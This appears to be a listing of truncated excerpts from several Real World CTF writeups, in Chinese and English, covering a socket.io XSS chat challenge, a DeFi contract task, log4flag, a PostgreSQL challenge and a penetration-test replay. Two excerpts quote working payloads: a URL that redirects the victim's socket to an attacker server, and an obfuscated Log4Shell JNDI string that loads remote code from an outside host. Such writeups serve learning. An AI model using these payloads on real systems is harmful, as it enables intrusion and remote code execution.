一个基于http://socket.io的聊天室,当时进去很混乱,也很纳闷一个公共的聊天室打XSS别人不会上车吗?但实际不是这样的,重点是这个http://socket.io的问题 (准确来说是http://socket.io中的parseuri问题)。 题目给了源码,前端index.html关键部分。 function reset() { location.href = `?nickname=guest${Str...
赛博世界的对垒NO MAGIC,讲究一个日常狂练手。除了可遇不可求的真题演练和靶场实战机会,赛后writeup绝对是个白嫖拓展解题思路和方法、分析其他人对于安全漏洞的发现和利用方式、借鉴经验从而在比赛中节省时间的好东西。 网传第六届Real World CTF赛后,出题组大佬将亲自出马撰写writeup,甭管尊嘟假嘟,小编先行期待...
咱Real World CTF搞的既不是国内CTF意义上的浏览器题目,也不是国外CTF意义上的浏览器PWN,而是“传统“浏览器基础上的改进。 #攻略05 狂练手!Writeup/真题/靶场, 不容错过! 赛博世界的对垒NO MAGIC,讲究一个日常狂练手。除了可遇不可求的真题演练和靶场实战机会,赛后writeup绝对是个白嫖拓展解题思路和方法、...
赛后参考 https://ctftime.org/writeup/36057 发现这题实际上是让前端的socket连接到我们自己的服务器上从而实现xss的。 这位是师傅的payload是这样的 http://47.254.28.30:58000/?room=DOMPurify&nickname=guest5279@85.244.211.240:9000 @ 后面是自己的服务器地址。 那这是什么原理呢? 详细分析 注意他前端连接...
EasyDefi是一道面向去中心化金融服务的智能合约题目。 题目代码通过附件的形式给出。 同时我们可以通过题目描述了解到 ChaitinSwap的逻辑和Uniswap基本类似,只是更改了手续费比例。 ChaitinBank听上去是某种提供了借贷服务的Defi项目, 我们看一下代码: Bank仅提供了两个功能接口,一个用FeiCoin换Flag,另一个使用Flag换FeiC...
我们是由Eur3kA和flappypig组成的联合战队r3kapig。上周末,我们参与了长亭科技举办的Real World CTF 并取得了第三名的成绩。题目很有趣,所以我们决定把我们做出来的题目的writeup发出来分享给大家。 另外我们战队目前正在招募队员,欢迎想与我们一起玩的同学加入我们,尤其是熟悉密码学或浏览器利用的大佬。给大家递茶...
log4flag Be-a-Database-Hacker the Secrets of Memory baby flaglab Flag Console Be-a-Database-Hacker 2 Java Remote Debugger Digital Souvenir rwctf{RealWorldIsAwesome} 1. log4flag 有一些正则过滤 网上bypass方法很多,随便找一个就行 ${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp} ...
We have achieved #7 inReal World CTFthis year. The experience is quite nice, although we have completed the challenge in a hard way.. Let's get into the hard way 2048! Writeup The Challenge The challenge is a web server, it has functionalities below: ...
Real World CTF 2020 DBaaSadge Writeup 昨天刚打的RWCTF比赛,觉得题目是非常不错的,至少这个环境下,postgre是大部分Web选手的弱项,圈内也没有什么自动化测试工具,因此写这篇WP还是有必要的。 由于大部分关键的技术点是我队里的亲姐们——鱼先做了,所以这里先贴一下人家的博客里的wp(鱼哥看到记得来拍我)...
RealWorldCTF渗透赛第二期复现-ctfshow 比赛概述# 开始时间:2023年3月10日15时 环境保留时间:72小时 环境重置时间:20分钟 官方wp链接:Docs (feishu.cn) 【本次复现跟着官方WP进行,只做记录学习之用】 0x1 目标资产# 渗透域名:https://i.am.ctfer.com...